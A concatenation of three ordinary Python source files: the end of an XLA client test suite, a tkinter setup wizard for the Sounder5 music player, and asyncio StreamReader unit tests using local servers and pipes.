true_operand = c.ConstantF32Scalar(3.)
true_computation = self._CreateMulF32By2Computation()
false_operand = c.ConstantF32Scalar(2.)
false_computation = self._CreateConstantF32Computation()
c.Conditional(pred, true_operand, true_computation, false_operand,
false_computation)
self._ExecuteAndCompareClose(c, expected=6.)
def testConditionalFalse(self):
c = self._NewComputation()
pred = c.ConstantPredScalar(False)
true_operand = c.ConstantF32Scalar(3.)
true_computation = self._CreateMulF32By2Computation()
false_operand = c.ConstantF32Scalar(2.)
false_computation = self._CreateConstantF32Computation()
c.Conditional(pred, true_operand, true_computation, false_operand,
false_computation)
self._ExecuteAndCompareClose(c, expected=1.)
def testInfeedS32Values(self):
to_infeed = NumpyArrayS32([1, 2, 3, 4])
c = self._NewComputation()
c.Infeed(xla_client.Shape.from_pyval(to_infeed[0]))
compiled_c = c.Build().CompileWithExampleArguments()
for item in to_infeed:
xla_client.transfer_to_infeed(item)
for item in to_infeed:
result = compiled_c.ExecuteWithPythonValues()
self.assertEqual(result, item)
def testInfeedThenOutfeedS32(self):
to_round_trip = NumpyArrayS32([1, 2, 3, 4])
c = self._NewComputation()
x = c.Infeed(xla_client.Shape.from_pyval(to_round_trip[0]))
c.Outfeed(x)
compiled_c = c.Build().CompileWithExampleArguments()
for want in to_round_trip:
execution = threading.Thread(target=compiled_c.Execute)
execution.start()
xla_client.transfer_to_infeed(want)
got = xla_client.transfer_from_outfeed(
xla_client.Shape.from_pyval(to_round_trip[0]))
execution.join()
self.assertEqual(want, got)
def testScatter(self):
a = np.arange(9).astype(np.int32).reshape((3, 3))
scatter_indices = np.array([0, 2], dtype=np.int32)
updates = np.array([[10, 20, 30], [70, 80, 90]], dtype=np.int32)
dnums = xla_client.xla_data_pb2.ScatterDimensionNumbers()
dnums.update_window_dims.append(1)
dnums.inserted_window_dims.append(0)
dnums.scatter_dims_to_operand_dims.append(0)
dnums.index_vector_dim = 1
c = self._NewComputation()
c.Scatter(c.Constant(a), c.Constant(scatter_indices), c.Constant(updates),
self._CreateBinaryAddS32Computation(), dnums)
expected = np.array([[10, 21, 32], [3, 4, 5], [76, 87, 98]], dtype=np.int32)
self._ExecuteAndCompareClose(c, expected=expected)
class ErrorTest(ComputationTest):
def setUp(self):
self.f32_scalar_2 = NumpyArrayF32(2.0)
self.s32_scalar_2 = NumpyArrayS32(2)
def testInvokeWithWrongElementType(self):
c = self._NewComputation()
c.SetOpMetadata(xla_client.CurrentSourceInfoMetadata())
c.ParameterFromNumpy(self.s32_scalar_2)
c.ClearOpMetadata()
self.assertRaisesRegexp(
RuntimeError, r"Invalid argument shape.*xla_client_test.py.*"
r"expected s32\[\], got f32\[\]",
lambda: c.Build().CompileWithExampleArguments([self.f32_scalar_2]))
class ComputationRootTest(ComputationTest):
"""Tests related to setting the root of the computation."""
def testComputationRootDifferentFromLastOp(self):
c = self._NewComputation()
x = c.ParameterFromNumpy(NumpyArrayF32(2.0))
result = c.Add(x, c.ConstantF32Scalar(3.14))
extra = c.Add(result, c.ConstantF32Scalar(1.618)) # pylint: disable=unused-variable
arg = NumpyArrayF32(1.0)
compiled_c = c.Build(result).CompileWithExampleArguments([arg])
ans = compiled_c.ExecuteWithPythonValues([arg])
np.testing.assert_allclose(ans, 4.14)
if __name__ == "__main__":
unittest.main()
|
Setup.py
|
try:
from tkinter import Toplevel, ttk, Canvas, StringVar, BooleanVar
from tkinter.filedialog import askdirectory
from typing import ClassVar
from Components.Debugger import Debugger
from os.path import isfile, join, isdir, basename, abspath, join
from time import sleep
from PIL import Image, ImageTk
from threading import Thread
except ImportError as err:
exit(err)
class SSetup(Toplevel):
def __init__(self: ClassVar, parent: ClassVar, settings: dict) -> None:
super().__init__(parent)
# variables
self.settings = settings
self.parent = parent
self.pages: int = 4
# hide window
self.withdraw()
# configure window
self.geometry(f'500x620+{int(self.winfo_x() + ((self.winfo_screenwidth() / 2) - 250))}+{int(self.winfo_y() + ((self.winfo_screenheight() / 2) - 310))}')
self.resizable(False, False)
self.title('Sounder configurator')
self.protocol('WM_DELETE_WINDOW', self.exit_app)
self.bind('<F12>', lambda _: Debugger(self))
# init layout
self.init_layout()
# load icons
self.load_icons()
# apply theme
self.apply_theme()
# init ui
self.init_ui()
# show window
self.deiconify()
def exit_app(self: ClassVar) -> None:
self.quit()
self.destroy()
def init_layout(self: ClassVar) -> None:
# init theme object
self.layout: ClassVar = ttk.Style()
# set theme to clam
self.layout.theme_use('clam')
# button
self.layout.layout('TButton', [('Button.padding', {'sticky': 'nswe', 'children': [('Button.label', {'sticky': 'nswe'})]})])
# radiobutton
self.layout.layout('TRadiobutton', [('Radiobutton.padding', {'sticky': 'nswe', 'children': [('Radiobutton.label', {'sticky': 'nswe'})]})])
# scrollbar
self.layout.layout('Vertical.TScrollbar', [('Vertical.Scrollbar.trough', {'children': [('Vertical.Scrollbar.thumb', {'expand': '1', 'sticky': 'nswe'})], 'sticky': 'ns'})])
def init_ui(self: ClassVar) -> None:
# variables
self.theme: StringVar = StringVar(value='System')
self.updates: BooleanVar = BooleanVar(value=True)
# setup panels
pages_panel: ClassVar = ttk.Frame(self)
pages_panel.pack(side='top', fill='both', expand=True)
# progress
self.progress_bar: ClassVar = ttk.Progressbar(self, maximum=self.pages * 100, value=0)
self.progress_bar.pack(side='bottom', fill='x')
# page 1
welcome_panel: ClassVar = ttk.Frame(pages_panel)
welcome_content: ClassVar = ttk.Frame(welcome_panel)
ttk.Label(welcome_content, text='Welcome to Sounder5!', style='second.TLabel').pack(side='top', pady=10, anchor='c')
ttk.Button(welcome_content, text='Start listening!', image=self.icons['arrow'][1], compound='right', style='second.TButton', command=lambda: self.next_page(folder_panel)).pack(side='top', pady=10, anchor='c')
welcome_content.pack(anchor='c', padx=10, pady=10, expand=True)
welcome_panel.place(x=0, y=0, relwidth=1, relheight=1)
# page 2
folder_panel: ClassVar = ttk.Frame(pages_panel)
folder_scrollbar: ClassVar = ttk.Scrollbar(folder_panel)
folder_scrollbar.pack(side='right', fill='y')
ttk.Label(folder_panel, text='Let\'s start with music!', style='second.TLabel').pack(side='top', anchor='c', pady=(10, 0))
ttk.Label(folder_panel, text='Show us where you store your music.', style='third.TLabel').pack(side='top', anchor='c')
# player content
folder_canvas: ClassVar = Canvas(folder_panel, background=self['background'], bd=0, highlightthickness=0, yscrollcommand=folder_scrollbar.set, takefocus=False)
# link scrollbar to canvas
folder_scrollbar.configure(command=folder_canvas.yview)
self.folder_panels: ClassVar = ttk.Frame(folder_canvas)
self.folder_panels.bind('<Configure>', lambda _: folder_canvas.configure(scrollregion=folder_canvas.bbox("all")))
folder_window: ClassVar = folder_canvas.create_window((0, 0), window=self.folder_panels, anchor='nw')
folder_canvas.bind('<Configure>', lambda _: folder_canvas.itemconfigure(folder_window, width=folder_canvas.winfo_width(), height=0))
folder_canvas.pack(side='top', padx=10, pady=10, anchor='c', fill='both')
folder_buttons: ClassVar = ttk.Frame(folder_panel)
# add folder button
ttk.Button(folder_buttons, text='Add folder', image=self.icons['plus'], compound='left', style='second.TButton', command=self.add_folder).pack(side='left', pady=5, padx=(10, 25))
# skip / continue button
self.folder_button: ClassVar = ttk.Button(folder_buttons, text='Skip', image=self.icons['arrow'][1], compound='right', style='second.TButton', command=lambda: self.next_page(appearance_panel))
self.folder_button.pack(side='right', pady=5, padx=(25, 10))
folder_buttons.pack(side='bottom', pady=5)
folder_panel.place(x=0, y=0, relwidth=1, relheight=1)
# page 3
appearance_panel: ClassVar = ttk.Frame(pages_panel)
ttk.Label(appearance_panel, text='Theme!', style='second.TLabel').pack(side='top', anchor='c', pady=(10, 0))
ttk.Label(appearance_panel, text='Shine bright like a star or be dark like a boss!', style='third.TLabel').pack(side='top', anchor='c')
appearance_content: ClassVar = ttk.Frame(appearance_panel)
ttk.Radiobutton(appearance_content, image=self.icons['brush'], text='Light', compound='left', variable=self.theme, value='Light', command=self.change_theme).pack(side='top', fill='x', padx=10, pady=5, ipadx=45)
ttk.Radiobutton(appearance_content, image=self.icons['brush'], text='Dark', compound='left', variable=self.theme, value='Dark', command=self.change_theme).pack(side='top', fill='x', padx=10, pady=5, ipadx=45)
ttk.Radiobutton(appearance_content, image=self.icons['brush'], text='System', compound='left', variable=self.theme, value='System', command=self.change_theme).pack(side='top', fill='x', padx=10, pady=5, ipadx=45)
appearance_content.pack(anchor='c', padx=10, pady=10, expand=True)
ttk.Button(appearance_panel, text='Next', image=self.icons['arrow'][1], compound='right', style='second.TButton', command=lambda: self.next_page(updates_panel)).pack(side='bottom', pady=10, anchor='c')
appearance_panel.place(x=0, y=0, relwidth=1, relheight=1)
# page 4
updates_panel: ClassVar = ttk.Frame(pages_panel)
ttk.Label(updates_panel, text='Updates!', style='second.TLabel').pack(side='top', anchor='c', pady=(10, 0))
ttk.Label(updates_panel, text='That\'s right, everybody likes updates!', style='third.TLabel').pack(side='top', anchor='c')
updates_content: ClassVar = ttk.Frame(updates_panel)
ttk.Radiobutton(updates_content, image=self.icons['checkmark'], text='Yes, check for updates!', compound='left', value=True, variable=self.updates, command=self.change_updates).pack(side='top', fill='x', padx=10, pady=5, ipadx=45)
ttk.Radiobutton(updates_content, image=self.icons['delete'], text='No :(', compound='left', value=False, variable=self.updates, command=self.change_updates).pack(side='top', fill='x', padx=10, pady=5, ipadx=45)
updates_content.pack(anchor='c', padx=10, pady=10, expand=True)
ttk.Button(updates_panel, text='Next', image=self.icons['arrow'][1], compound='right', style='second.TButton', command=lambda: self.next_page(final_panel)).pack(side='bottom', pady=10, anchor='c')
updates_panel.place(x=0, y=0, relwidth=1, relheight=1)
# final
final_panel: ClassVar = ttk.Frame(pages_panel)
final_content: ClassVar = ttk.Frame(final_panel)
ttk.Label(final_content, text='That\'s all!', style='second.TLabel').pack(side='top', pady=10, anchor='c')
ttk.Button(final_content, text='Finish', image=self.icons['checkmark'], compound='left', style='second.TButton', command=self.exit_app).pack(side='top', pady=10, anchor='c')
final_content.pack(anchor='c', padx=10, pady=10, expand=True)
final_panel.place(x=0, y=0, relwidth=1, relheight=1)
# show welcome panel
welcome_panel.lift()
def load_icons(self: ClassVar) -> None:
self.icons: dict = {
'arrow': (ImageTk.PhotoImage(Image.open('Resources\\Icons\\Configurator\\left.png').resize((25, 25))), ImageTk.PhotoImage(Image.open('Resources\\Icons\\Dark\\right.png').resize((25, 25)))),
'logo': ImageTk.PhotoImage(Image.open('Resources\\Icons\\Configurator\\setup.png')),
'plus': ImageTk.PhotoImage(Image.open('Resources\\Icons\\Configurator\\plus.png').resize((25, 25))),
'folder': ImageTk.PhotoImage(Image.open('Resources\\Icons\\Configurator\\music_folder.png').resize((25, 25))),
'delete': ImageTk.PhotoImage(Image.open('Resources\\Icons\\Configurator\\delete.png').resize((25, 25))),
'brush': ImageTk.PhotoImage(Image.open('Resources\\Icons\\Configurator\\brush.png').resize((25, 25))),
'checkmark': ImageTk.PhotoImage(Image.open('Resources\\Icons\\Configurator\\checkmark.png').resize((25, 25))),
}
self.iconphoto(False, self.icons['logo'])
def apply_theme(self: ClassVar) -> None:
# window
self.configure(background='#212121')
# frame
self.layout.configure('TFrame', background='#212121')
self.layout.configure('second.TFrame', background='#111')
# label
self.layout.configure('TLabel', background='#111', relief='flat', font=('catamaran 13 bold'), foreground='#fff')
self.layout.configure('second.TLabel', background='#212121', font=('catamaran 30 bold'), anchor='c')
self.layout.configure('third.TLabel', background='#212121')
# radiobutton
self.layout.configure('TRadiobutton', background='#212121', relief='flat', font=('catamaran 13 bold'), foreground='#fff', anchor='w', padding=10, width=12)
self.layout.map('TRadiobutton', background=[('pressed', '!disabled', '#111'), ('active', '#111'), ('selected', '#111')])
# button
self.layout.configure('TButton', background='#111', relief='flat', font=('catamaran 13 bold'), foreground='#fff', anchor='w')
self.layout.map('TButton', background=[('pressed', '!disabled', '#212121'), ('active', '#212121'), ('selected', '#212121')])
self.layout.configure('second.TButton', anchor='c')
self.layout.configure('third.TButton', anchor='c', background='#fff', foreground='#000')
self.layout.map('third.TButton', background=[('pressed', '!disabled', '#eee'), ('active', '#eee'), ('selected', '#eee')])
# scrollbar
self.layout.configure('Vertical.TScrollbar', gripcount=0, relief='flat', background='#212121', darkcolor='#212121', lightcolor='#212121', troughcolor='#212121', bordercolor='#212121')
self.layout.map('Vertical.TScrollbar', background=[('pressed', '!disabled', '#111'), ('disabled', '#212121'), ('active', '#111'), ('!active', '#111')])
# scale
self.layout.configure('Horizontal.TProgressbar', foreground='#111', background='#111', lightcolor='#111', darkcolor='#111', bordercolor='#212121', troughcolor='#212121')
def add_folder(self: ClassVar) -> None:
temp_dir: str = askdirectory()
if temp_dir and not temp_dir in self.settings['folders']:
temp_dir = abspath(temp_dir)
# add folder to settings
self.settings['folders'].append(temp_dir)
# draw folder in app
folder_panel: ClassVar = ttk.Frame(self.folder_panels, style='second.TFrame')
path_label: ClassVar = ttk.Label(folder_panel, image=self.icons['folder'], text=basename(temp_dir), compound='left')
path_label.pack(side='left', anchor='c', fill='y', pady=10, padx=10)
ttk.Button(folder_panel, image=self.icons['delete'], takefocus=False, command=lambda: self.remove_folder(folder_panel, temp_dir)).pack(side='right', padx=10, anchor='c')
folder_panel.bind('<Leave>', lambda _:path_label.configure(text=basename(temp_dir)))
folder_panel.bind('<Enter>', lambda _:path_label.configure(text=temp_dir))
folder_panel.pack(side='top', fill='x', pady=5, padx=10)
self.folder_button.configure(text='Continue')
def remove_folder(self: ClassVar, panel: ClassVar, folder: str) -> None:
if folder in self.settings['folders']:
self.settings['folders'].remove(folder)
panel.destroy()
if len(self.settings['folders']) == 0:
self.folder_button.configure(text='Skip')
def change_theme(self: ClassVar) -> None:
theme: str = self.theme.get()
if theme != 'System':
self.settings['use_system_theme'] = False
self.settings['theme'] = theme
def change_updates(self: ClassVar) -> None:
self.settings['updates'] = self.updates.get()
def next_page(self: ClassVar, page: ClassVar) -> None:
Thread(target=self.update_progress, daemon=True).start()
page.lift()
def update_progress(self: ClassVar) -> None:
for _ in range(10):
self.progress_bar['value'] += 10
sleep(0.01)
if self.progress_bar['value'] == self.pages * 100:
self.progress_bar['value'] = 0
|
test_streams.py
|
"""Tests for streams.py."""
import gc
import os
import queue
import socket
import sys
import threading
import unittest
from unittest import mock
try:
import ssl
except ImportError:
ssl = None
import asyncio
from asyncio import test_utils
class StreamReaderTests(test_utils.TestCase):
DATA = b'line1\nline2\nline3\n'
def setUp(self):
self.loop = asyncio.new_event_loop()
self.set_event_loop(self.loop)
def tearDown(self):
# just in case if we have transport close callbacks
test_utils.run_briefly(self.loop)
self.loop.close()
gc.collect()
super().tearDown()
@mock.patch('asyncio.streams.events')
def test_ctor_global_loop(self, m_events):
stream = asyncio.StreamReader()
self.assertIs(stream._loop, m_events.get_event_loop.return_value)
def _basetest_open_connection(self, open_connection_fut):
reader, writer = self.loop.run_until_complete(open_connection_fut)
writer.write(b'GET / HTTP/1.0\r\n\r\n')
f = reader.readline()
data = self.loop.run_until_complete(f)
self.assertEqual(data, b'HTTP/1.0 200 OK\r\n')
f = reader.read()
data = self.loop.run_until_complete(f)
self.assertTrue(data.endswith(b'\r\n\r\nTest message'))
writer.close()
def test_open_connection(self):
with test_utils.run_test_server() as httpd:
conn_fut = asyncio.open_connection(*httpd.address,
loop=self.loop)
self._basetest_open_connection(conn_fut)
@unittest.skipUnless(hasattr(socket, 'AF_UNIX'), 'No UNIX Sockets')
def test_open_unix_connection(self):
with test_utils.run_test_unix_server() as httpd:
conn_fut = asyncio.open_unix_connection(httpd.address,
loop=self.loop)
self._basetest_open_connection(conn_fut)
def _basetest_open_connection_no_loop_ssl(self, open_connection_fut):
try:
reader, writer = self.loop.run_until_complete(open_connection_fut)
finally:
asyncio.set_event_loop(None)
writer.write(b'GET / HTTP/1.0\r\n\r\n')
f = reader.read()
data = self.loop.run_until_complete(f)
self.assertTrue(data.endswith(b'\r\n\r\nTest message'))
writer.close()
@unittest.skipIf(ssl is None, 'No ssl module')
def test_open_connection_no_loop_ssl(self):
with test_utils.run_test_server(use_ssl=True) as httpd:
conn_fut = asyncio.open_connection(
*httpd.address,
ssl=test_utils.dummy_ssl_context(),
loop=self.loop)
self._basetest_open_connection_no_loop_ssl(conn_fut)
@unittest.skipIf(ssl is None, 'No ssl module')
@unittest.skipUnless(hasattr(socket, 'AF_UNIX'), 'No UNIX Sockets')
def test_open_unix_connection_no_loop_ssl(self):
with test_utils.run_test_unix_server(use_ssl=True) as httpd:
conn_fut = asyncio.open_unix_connection(
httpd.address,
ssl=test_utils.dummy_ssl_context(),
server_hostname='',
loop=self.loop)
self._basetest_open_connection_no_loop_ssl(conn_fut)
def _basetest_open_connection_error(self, open_connection_fut):
reader, writer = self.loop.run_until_complete(open_connection_fut)
writer._protocol.connection_lost(ZeroDivisionError())
f = reader.read()
with self.assertRaises(ZeroDivisionError):
self.loop.run_until_complete(f)
writer.close()
test_utils.run_briefly(self.loop)
def test_open_connection_error(self):
with test_utils.run_test_server() as httpd:
conn_fut = asyncio.open_connection(*httpd.address,
loop=self.loop)
self._basetest_open_connection_error(conn_fut)
@unittest.skipUnless(hasattr(socket, 'AF_UNIX'), 'No UNIX Sockets')
def test_open_unix_connection_error(self):
with test_utils.run_test_unix_server() as httpd:
conn_fut = asyncio.open_unix_connection(httpd.address,
loop=self.loop)
self._basetest_open_connection_error(conn_fut)
def test_feed_empty_data(self):
stream = asyncio.StreamReader(loop=self.loop)
stream.feed_data(b'')
self.assertEqual(b'', stream._buffer)
def test_feed_nonempty_data(self):
stream = asyncio.StreamReader(loop=self.loop)
stream.feed_data(self.DATA)
self.assertEqual(self.DATA, stream._buffer)
def test_read_zero(self):
# Read zero bytes.
stream = asyncio.StreamReader(loop=self.loop)
stream.feed_data(self.DATA)
data = self.loop.run_until_complete(stream.read(0))
self.assertEqual(b'', data)
self.assertEqual(self.DATA, stream._buffer)
def test_read(self):
# Read bytes.
stream = asyncio.StreamReader(loop=self.loop)
read_task = asyncio.Task(stream.read(30), loop=self.loop)
def cb():
stream.feed_data(self.DATA)
self.loop.call_soon(cb)
data = self.loop.run_until_complete(read_task)
self.assertEqual(self.DATA, data)
self.assertEqual(b'', stream._buffer)
def test_read_line_breaks(self):
# Read bytes without line breaks.
stream = asyncio.StreamReader(loop=self.loop)
stream.feed_data(b'line1')
stream.feed_data(b'line2')
data = self.loop.run_until_complete(stream.read(5))
self.assertEqual(b'line1', data)
self.assertEqual(b'line2', stream._buffer)
def test_read_eof(self):
# Read bytes, stop at eof.
stream = asyncio.StreamReader(loop=self.loop)
read_task = asyncio.Task(stream.read(1024), loop=self.loop)
def cb():
stream.feed_eof()
self.loop.call_soon(cb)
data = self.loop.run_until_complete(read_task)
self.assertEqual(b'', data)
self.assertEqual(b'', stream._buffer)
def test_read_until_eof(self):
# Read all bytes until eof.
stream = asyncio.StreamReader(loop=self.loop)
read_task = asyncio.Task(stream.read(-1), loop=self.loop)
def cb():
stream.feed_data(b'chunk1\n')
stream.feed_data(b'chunk2')
stream.feed_eof()
self.loop.call_soon(cb)
data = self.loop.run_until_complete(read_task)
self.assertEqual(b'chunk1\nchunk2', data)
self.assertEqual(b'', stream._buffer)
def test_read_exception(self):
stream = asyncio.StreamReader(loop=self.loop)
stream.feed_data(b'line\n')
data = self.loop.run_until_complete(stream.read(2))
self.assertEqual(b'li', data)
stream.set_exception(ValueError())
self.assertRaises(
ValueError, self.loop.run_until_complete, stream.read(2))
def test_readline(self):
# Read one line. 'readline' will need to wait for the data
# to come from 'cb'
stream = asyncio.StreamReader(loop=self.loop)
stream.feed_data(b'chunk1 ')
read_task = asyncio.Task(stream.readline(), loop=self.loop)
def cb():
stream.feed_data(b'chunk2 ')
stream.feed_data(b'chunk3 ')
stream.feed_data(b'\n chunk4')
self.loop.call_soon(cb)
line = self.loop.run_until_complete(read_task)
self.assertEqual(b'chunk1 chunk2 chunk3 \n', line)
self.assertEqual(b' chunk4', stream._buffer)
def test_readline_limit_with_existing_data(self):
# Read one line. The data is in StreamReader's buffer
# before the event loop is run.
stream = asyncio.StreamReader(limit=3, loop=self.loop)
stream.feed_data(b'li')
stream.feed_data(b'ne1\nline2\n')
self.assertRaises(
ValueError, self.loop.run_until_complete, stream.readline())
# The buffer should contain the remaining data after exception
self.assertEqual(b'line2\n', stream._buffer)
stream = asyncio.StreamReader(limit=3, loop=self.loop)
stream.feed_data(b'li')
stream.feed_data(b'ne1')
stream.feed_data(b'li')
self.assertRaises(
ValueError, self.loop.run_until_complete, stream.readline())
# No b'\n' at the end. The 'limit' is set to 3. So before
# waiting for the new data in buffer, 'readline' will consume
# the entire buffer, and since the length of the consumed data
# is more than 3, it will raise a ValueError. The buffer is
# expected to be empty now.
self.assertEqual(b'', stream._buffer)
def test_at_eof(self):
stream = asyncio.StreamReader(loop=self.loop)
self.assertFalse(stream.at_eof())
stream.feed_data(b'some data\n')
self.assertFalse(stream.at_eof())
self.loop.run_until_complete(stream.readline())
self.assertFalse(stream.at_eof())
stream.feed_data(b'some data\n')
stream.feed_eof()
self.loop.run_until_complete(stream.readline())
self.assertTrue(stream.at_eof())
def test_readline_limit(self):
# Read one line. StreamReaders are fed with data after
# their 'readline' methods are called.
stream = asyncio.StreamReader(limit=7, loop=self.loop)
def cb():
stream.feed_data(b'chunk1')
stream.feed_data(b'chunk2')
stream.feed_data(b'chunk3\n')
stream.feed_eof()
self.loop.call_soon(cb)
self.assertRaises(
ValueError, self.loop.run_until_complete, stream.readline())
# The buffer had just one line of data, and after raising
# a ValueError it should be empty.
self.assertEqual(b'', stream._buffer)
stream = asyncio.StreamReader(limit=7, loop=self.loop)
def cb():
stream.feed_data(b'chunk1')
stream.feed_data(b'chunk2\n')
stream.feed_data(b'chunk3\n')
stream.feed_eof()
self.loop.call_soon(cb)
self.assertRaises(
ValueError, self.loop.run_until_complete, stream.readline())
self.assertEqual(b'chunk3\n', stream._buffer)
def test_readline_nolimit_nowait(self):
# All needed data for the first 'readline' call will be
# in the buffer.
stream = asyncio.StreamReader(loop=self.loop)
stream.feed_data(self.DATA[:6])
stream.feed_data(self.DATA[6:])
line = self.loop.run_until_complete(stream.readline())
self.assertEqual(b'line1\n', line)
self.assertEqual(b'line2\nline3\n', stream._buffer)
def test_readline_eof(self):
stream = asyncio.StreamReader(loop=self.loop)
stream.feed_data(b'some data')
stream.feed_eof()
line = self.loop.run_until_complete(stream.readline())
self.assertEqual(b'some data', line)
def test_readline_empty_eof(self):
stream = asyncio.StreamReader(loop=self.loop)
stream.feed_eof()
line = self.loop.run_until_complete(stream.readline())
self.assertEqual(b'', line)
def test_readline_read_byte_count(self):
stream = asyncio.StreamReader(loop=self.loop)
stream.feed_data(self.DATA)
self.loop.run_until_complete(stream.readline())
data = self.loop.run_until_complete(stream.read(7))
self.assertEqual(b'line2\nl', data)
self.assertEqual(b'ine3\n', stream._buffer)
def test_readline_exception(self):
stream = asyncio.StreamReader(loop=self.loop)
stream.feed_data(b'line\n')
data = self.loop.run_until_complete(stream.readline())
self.assertEqual(b'line\n', data)
stream.set_exception(ValueError())
self.assertRaises(
ValueError, self.loop.run_until_complete, stream.readline())
self.assertEqual(b'', stream._buffer)
def test_readexactly_zero_or_less(self):
# Read exact number of bytes (zero or less).
stream = asyncio.StreamReader(loop=self.loop)
stream.feed_data(self.DATA)
data = self.loop.run_until_complete(stream.readexactly(0))
self.assertEqual(b'', data)
self.assertEqual(self.DATA, stream._buffer)
with self.assertRaisesRegex(ValueError, 'less than zero'):
self.loop.run_until_complete(stream.readexactly(-1))
self.assertEqual(self.DATA, stream._buffer)
def test_readexactly(self):
# Read exact number of bytes.
stream = asyncio.StreamReader(loop=self.loop)
n = 2 * len(self.DATA)
read_task = asyncio.Task(stream.readexactly(n), loop=self.loop)
def cb():
stream.feed_data(self.DATA)
stream.feed_data(self.DATA)
stream.feed_data(self.DATA)
self.loop.call_soon(cb)
data = self.loop.run_until_complete(read_task)
self.assertEqual(self.DATA + self.DATA, data)
self.assertEqual(self.DATA, stream._buffer)
def test_readexactly_eof(self):
# Read exact number of bytes (eof).
stream = asyncio.StreamReader(loop=self.loop)
n = 2 * len(self.DATA)
read_task = asyncio.Task(stream.readexactly(n), loop=self.loop)
def cb():
stream.feed_data(self.DATA)
stream.feed_eof()
self.loop.call_soon(cb)
with self.assertRaises(asyncio.IncompleteReadError) as cm:
self.loop.run_until_complete(read_task)
self.assertEqual(cm.exception.partial, self.DATA)
self.assertEqual(cm.exception.expected, n)
self.assertEqual(str(cm.exception),
'18 bytes read on a total of 36 expected bytes')
self.assertEqual(b'', stream._buffer)
def test_readexactly_exception(self):
stream = asyncio.StreamReader(loop=self.loop)
stream.feed_data(b'line\n')
data = self.loop.run_until_complete(stream.readexactly(2))
self.assertEqual(b'li', data)
stream.set_exception(ValueError())
self.assertRaises(
ValueError, self.loop.run_until_complete, stream.readexactly(2))
def test_exception(self):
stream = asyncio.StreamReader(loop=self.loop)
self.assertIsNone(stream.exception())
exc = ValueError()
stream.set_exception(exc)
self.assertIs(stream.exception(), exc)
def test_exception_waiter(self):
stream = asyncio.StreamReader(loop=self.loop)
@asyncio.coroutine
def set_err():
stream.set_exception(ValueError())
t1 = asyncio.Task(stream.readline(), loop=self.loop)
t2 = asyncio.Task(set_err(), loop=self.loop)
self.loop.run_until_complete(asyncio.wait([t1, t2], loop=self.loop))
self.assertRaises(ValueError, t1.result)
def test_exception_cancel(self):
stream = asyncio.StreamReader(loop=self.loop)
t = asyncio.Task(stream.readline(), loop=self.loop)
test_utils.run_briefly(self.loop)
t.cancel()
test_utils.run_briefly(self.loop)
# The following line fails if set_exception() isn't careful.
stream.set_exception(RuntimeError('message'))
test_utils.run_briefly(self.loop)
self.assertIs(stream._waiter, None)
def test_start_server(self):
class MyServer:
def __init__(self, loop):
self.server = None
self.loop = loop
@asyncio.coroutine
def handle_client(self, client_reader, client_writer):
data = yield from client_reader.readline()
client_writer.write(data)
yield from client_writer.drain()
client_writer.close()
def start(self):
sock = socket.socket()
sock.bind(('127.0.0.1', 0))
self.server = self.loop.run_until_complete(
asyncio.start_server(self.handle_client,
sock=sock,
loop=self.loop))
return sock.getsockname()
def handle_client_callback(self, client_reader, client_writer):
self.loop.create_task(self.handle_client(client_reader,
client_writer))
def start_callback(self):
sock = socket.socket()
sock.bind(('127.0.0.1', 0))
addr = sock.getsockname()
sock.close()
self.server = self.loop.run_until_complete(
asyncio.start_server(self.handle_client_callback,
host=addr[0], port=addr[1],
loop=self.loop))
return addr
def stop(self):
if self.server is not None:
self.server.close()
self.loop.run_until_complete(self.server.wait_closed())
self.server = None
@asyncio.coroutine
def client(addr):
reader, writer = yield from asyncio.open_connection(
*addr, loop=self.loop)
# send a line
writer.write(b"hello world!\n")
# read it back
msgback = yield from reader.readline()
writer.close()
return msgback
# test the server variant with a coroutine as client handler
server = MyServer(self.loop)
addr = server.start()
msg = self.loop.run_until_complete(asyncio.Task(client(addr),
loop=self.loop))
server.stop()
self.assertEqual(msg, b"hello world!\n")
# test the server variant with a callback as client handler
server = MyServer(self.loop)
addr = server.start_callback()
msg = self.loop.run_until_complete(asyncio.Task(client(addr),
loop=self.loop))
server.stop()
self.assertEqual(msg, b"hello world!\n")
@unittest.skipUnless(hasattr(socket, 'AF_UNIX'), 'No UNIX Sockets')
def test_start_unix_server(self):
class MyServer:
def __init__(self, loop, path):
self.server = None
self.loop = loop
self.path = path
@asyncio.coroutine
def handle_client(self, client_reader, client_writer):
data = yield from client_reader.readline()
client_writer.write(data)
yield from client_writer.drain()
client_writer.close()
def start(self):
self.server = self.loop.run_until_complete(
asyncio.start_unix_server(self.handle_client,
path=self.path,
loop=self.loop))
def handle_client_callback(self, client_reader, client_writer):
self.loop.create_task(self.handle_client(client_reader,
client_writer))
def start_callback(self):
start = asyncio.start_unix_server(self.handle_client_callback,
path=self.path,
loop=self.loop)
self.server = self.loop.run_until_complete(start)
def stop(self):
if self.server is not None:
self.server.close()
self.loop.run_until_complete(self.server.wait_closed())
self.server = None
@asyncio.coroutine
def client(path):
reader, writer = yield from asyncio.open_unix_connection(
path, loop=self.loop)
# send a line
writer.write(b"hello world!\n")
# read it back
msgback = yield from reader.readline()
writer.close()
return msgback
# test the server variant with a coroutine as client handler
with test_utils.unix_socket_path() as path:
server = MyServer(self.loop, path)
server.start()
msg = self.loop.run_until_complete(asyncio.Task(client(path),
loop=self.loop))
server.stop()
self.assertEqual(msg, b"hello world!\n")
# test the server variant with a callback as client handler
with test_utils.unix_socket_path() as path:
server = MyServer(self.loop, path)
server.start_callback()
msg = self.loop.run_until_complete(asyncio.Task(client(path),
loop=self.loop))
server.stop()
self.assertEqual(msg, b"hello world!\n")
@unittest.skipIf(sys.platform == 'win32', "Don't have pipes")
def test_read_all_from_pipe_reader(self):
# See asyncio issue 168. This test is derived from the example
# subprocess_attach_read_pipe.py, but we configure the
# StreamReader's limit so that twice it is less than the size
# of the data writter. Also we must explicitly attach a child
# watcher to the event loop.
code = """\
import os, sys
fd = int(sys.argv[1])
os.write(fd, b'data')
os.close(fd)
"""
rfd, wfd = os.pipe()
args = [sys.executable, '-c', code, str(wfd)]
pipe = open(rfd, 'rb', 0)
reader = asyncio.StreamReader(loop=self.loop, limit=1)
protocol = asyncio.StreamReaderProtocol(reader, loop=self.loop)
transport, _ = self.loop.run_until_complete(
self.loop.connect_read_pipe(lambda: protocol, pipe))
watcher = asyncio.SafeChildWatcher()
watcher.attach_loop(self.loop)
try:
asyncio.set_child_watcher(watcher)
create = asyncio.create_subprocess_exec(*args,
pass_fds={wfd},
loop=self.loop)
proc = self.loop.run_until_complete(create)
self.loop.run_until_complete(proc.wait())
finally:
asyncio.set_child_watcher(None)
os.close(wfd)
data = self.loop.run_until_complete(reader.read(-1))
self.assertEqual(data, b'data')
